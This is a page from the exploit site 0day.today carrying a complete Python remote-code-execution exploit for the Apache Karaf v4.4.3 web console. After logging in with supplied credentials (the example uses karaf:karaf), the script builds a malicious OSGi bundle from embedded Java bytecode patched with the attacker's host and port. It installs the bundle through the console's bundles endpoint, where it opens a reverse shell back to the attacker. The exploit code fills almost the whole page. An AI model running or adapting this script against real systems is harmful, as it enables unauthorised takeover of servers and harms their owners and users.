0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Karaf v4.4.3 Console - Remote Code Execution Exploit

Author

Andrzej Olchawa

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

Platform

#!/usr/bin/python

# Exploit Title: [Karaf v4.4.3 Console RCE]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#           [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
#                   --lhost=192.168.0.100 --lport=4444 \
#                   --creds=karaf:karaf


"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests

# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
    "Bundle-Name: RevShell\n" \
    "Bundle-Description: Bundle openning a reverse shell connection.\n" \
    "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
    "Bundle-Vendor: VisionSpace\n" \
    "Bundle-Version: 1.0.0\n" \
    "Import-Package: org.osgi.framework\n" \
    "Bundle-Activator: com.visionspace.osgi.revshell.Activator"

# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
    b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
    b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
    b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
    b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
    b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
    b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
    b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
    b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
    b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
    b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
    b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
    b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
    b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
    b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
    b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
    b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
    b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
    b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
    b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
    b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
    b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
    b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
    b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
    b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
    b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
    b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
    b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
    b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
    b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
    b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
    b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
    b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
    b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
    b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
    b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
    b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
    b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
    b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
    b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
    b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
    b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
    b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
    b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
    b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
    b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
    b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
    b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
    b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
    b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
    b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
    b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
    b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
    b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
    b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
    b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
    b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
    b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
    b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
    b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
    b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
    b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
    b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
    b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
    b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
    b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
    b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
    b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
    b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
    b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
    b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
    b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
    b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
    b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
    b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
    b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
    b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
    b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
    b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
    b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
    b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
    b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
    b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
    b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
    b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
    b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
    b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
    b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
    b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
    b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
    b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
    b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
    b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
    b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
    b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
    b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
    b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
    b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
    b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
    b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
    b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
    b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
    b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
    b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
    b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
    b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
    b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
    b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
    b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
    b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
    b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
    b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
    b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
    b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
    b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
    b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
    b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
    b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
    b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
    b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
    b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
    b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
    b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
    b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
    b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
    b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
    b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
    b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
    b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
    b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
    b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
    b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
    b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
    b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
    b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
    b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
    b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
    b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
    b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
    b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
    b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
    b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
    b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
    b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
    b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
    b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
    b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
    b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
    b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
    b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
    b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
    b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
    b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
    b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
    b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
    b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
    b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
    b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
    b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
    b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
    b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
    b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
    b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
    b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
    b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
    b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
    b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
    b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
    b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
    b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
    b"\x32"

# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"


def parse():
    """
    This function parses the command-line arguments.
    """

    parser = argparse.ArgumentParser(
        prog="Karaf-Console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running Karaf Console",
        epilog="Happy Hacking! :)",
    )

    parser.add_argument("--rhost", dest="rhost",
                        help="remote host", type=str, required=True)
    parser.add_argument("--rport", dest="rport",
                        help="remote port", type=int, required=True)
    parser.add_argument("--lhost", dest="lhost",
                        help="local host", type=str, required=True)
    parser.add_argument("--lport", dest="lport",
                        help="local port", type=int, required=True)
    parser.add_argument("--creds", dest="creds",
                        help="credentials in format <username:password>",
                        type=str, required=True)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")

    return parser.parse_args()


def extract_jsessionid(cookie):
    """
    This function extracts the JSESSIONID from the cookie string.
    """

    jsessionid = None

    regex = re.findall("JSESSIONID=([^;]+)", cookie)
    if len(regex) > 0:
        jsessionid = regex[0]

    return jsessionid


def authenticate(target, basic_auth):
    """
    This function connects to the URL and retrieves the JSESSIONID
    based on the Basic Authorization.
    """

    jsessionid = None

    headers = {
        "Authorization": basic_auth
    }

    response = requests.get(target, headers=headers,
                            allow_redirects=False, timeout=10)

    if (response.status_code == 302 and response.headers["Set-Cookie"]):
        jsessionid = extract_jsessionid(response.headers["Set-Cookie"])

    return jsessionid


def generate_payload(lhost, lport):
    """
    This function generates the payload.
    It replaces the template payload with the `lhost` and `lport` arguments.
    """

    payload = None

    lhost_byte_array = bytearray()
    lhost_byte_array.append(len(lhost))
    lhost_byte_array.extend(map(ord, lhost))

    activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
        ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)

    lport_str = str(lport)
    lport_byte_array = bytearray()
    lport_byte_array.append(len(lport_str))
    lport_byte_array.extend(map(ord, lport_str))

    activator_class_bytecodes = activator_class_bytecodes.replace(
        ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)

    jar_bytes = io.BytesIO()

    with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
                          activator_class_bytecodes)
        zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)

    payload = jar_bytes.getvalue()

    return payload


def deploy_payload(target, basic_auth, jsessionid, payload):
    """
    This function connects to the Karaf Console and deployes the payload.
    """

    success = False

    url = f"{target}/bundles"

    cookies = {
        "JSESSIONID": jsessionid
    }

    headers = {
        "Authorization": basic_auth
    }

    files = {
        "bundlefile": (
            "revshell.jar", payload, "application/x-java-archive")
    }

    data = {
        "action": "install",
        "bundlestart": "start",
        "bundlestartlevel": 80
    }

    response = requests.post(url, headers=headers, cookies=cookies,
                             files=files, data=data, timeout=10,
                             allow_redirects=False)

    if response.status_code == 302:
        success = True

    return success


def generate_basic_auth(creds):
    """
    This function generates the Basic Authorization string based
    on the credentials.
    """

    creds_base64 = base64.b64encode(creds.encode()).decode()
    basic_auth = f"Basic {creds_base64}"

    return basic_auth


def create_target_url(rhost, rport):
    """
    This function creates a target URL.
    """

    target_url = f"http://{rhost}:{rport}/system/console"

    return target_url


def main(args):
    """
    Main function.
    """

    target = create_target_url(args.rhost, args.rport)

    print("[*] Login...")
    basic_auth = generate_basic_auth(args.creds)
    jsessionid = authenticate(target, basic_auth)

    if jsessionid:
        print("[+] Session established.")

        print("[*] Generating payload...")
        payload = generate_payload(args.lhost, args.lport)

        if payload:
            print("[*] Deploying payload...")
            if deploy_payload(target, basic_auth, jsessionid, payload):
                print("[+] Done.")
            else:
                print("[-] Failed to deploy the payload!")
        else:
            print("[-] Failed to generate the payload!")
    else:
        print("[-] Login failed!")


if __name__ == "__main__":
    main(parse())

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Karaf v4.4.3 Console - Remote Code Execution Exploit

Report Error

Report Error